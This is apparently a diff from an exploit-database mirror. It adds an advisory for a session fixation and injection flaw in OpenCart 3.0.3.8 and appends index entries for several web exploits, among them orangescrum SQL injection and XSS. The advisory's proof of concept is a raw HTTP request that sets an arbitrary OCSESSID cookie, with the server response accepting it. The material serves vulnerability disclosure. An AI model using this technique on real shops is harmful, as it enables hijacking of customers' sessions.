# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
|
||||
|
||||
### Sessjion Fixation / injection
|
||||
|
||||
Session cookie "OCSESSID" is inproperly processed
|
||||
Attacker can set any value cookie and server set this value
|
||||
Becouse of that sesssion injection and session fixation vulnerability
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
# POC
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
## Example
|
||||
|
||||
Modify cookie "OCSESSID" value:
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
Req
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
GET /opencart-3.0.3.8/index.php?route=product/category&path=20_26 HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: pl,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Referer: http://127.0.0.1/opencart-3.0.3.8/
|
||||
Cookie: language=en-gb; currency=USD; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USERSUB_TYPE=0; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=mydashboard; LISTVIEW_TYPE=comfort; TASKGROUPBY=duedate; TASK_TYPE_IN_DASHBOARD=10; CURRENT_FILTER=cases; DASHBOARD_ORDER=1_1%3A%3A1%2C2%2C3%2C5%2C6%2C8%2C9; CAKEPHP=ommpvclncs2t37j8tsep486ig5; OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-Fetch-Dest: document
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-User: ?1
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
Server set atttacker value:
|
||||
|
||||
Res:
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Date: Sun, 28 Nov 2021 15:16:06 GMT
|
||||
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
|
||||
X-Powered-By: PHP/8.0.11
|
||||
Set-Cookie: OCSESSID=zxcvzxcvzxcvzxcvzxcvzxcv; path=/
|
||||
Connection: close
|
||||
Content-Type: text/html; charset=utf-8
|
||||
Content-Length: 18944
|
||||
[...]
|
|
@ -42964,7 +42964,6 @@ id,file,description,date,author,type,platform,port
|
|||
47628,exploits/hardware/webapps/47628.txt,"CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin)",1970-01-01,LiquidWorm,webapps,hardware,
|
||||
47630,exploits/hardware/webapps/47630.txt,"CBAS-Web 19.0.0 - Username Enumeration",1970-01-01,LiquidWorm,webapps,hardware,
|
||||
47631,exploits/php/webapps/47631.txt,"CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection",1970-01-01,LiquidWorm,webapps,php,
|
||||
47632,exploits/php/webapps/47632.txt,"Joomla! 3.9.13 - 'Host' Header Injection",1970-01-01,"Pablo Santiago",webapps,php,
|
||||
47633,exploits/alpha/webapps/47633.txt,"Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting",1970-01-01,LiquidWorm,webapps,alpha,
|
||||
47634,exploits/hardware/webapps/47634.txt,"Prima Access Control 2.3.35 - Arbitrary File Upload",1970-01-01,LiquidWorm,webapps,hardware,
|
||||
47635,exploits/jsp/webapps/47635.rb,"Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)",1970-01-01,max7253,webapps,jsp,
|
||||
|
@ -44641,3 +44640,7 @@ id,file,description,date,author,type,platform,port
|
|||
50544,exploits/multiple/webapps/50544.txt,"FLEX 1085 Web 1.6.0 - HTML Injection",1970-01-01,"Mr Empy",webapps,multiple,
|
||||
50547,exploits/php/webapps/50547.py,"CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)",1970-01-01,S1lv3r,webapps,php,
|
||||
50548,exploits/multiple/webapps/50548.txt,"Bagisto 1.3.3 - Client-Side Template Injection",1970-01-01,"Mohamed Abdellatif Jaber",webapps,multiple,
|
||||
50551,exploits/multiple/webapps/50551.txt,"orangescrum 1.8.0 - Privilege escalation (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
|
||||
50553,exploits/multiple/webapps/50553.txt,"orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
|
||||
50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
|
||||
50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue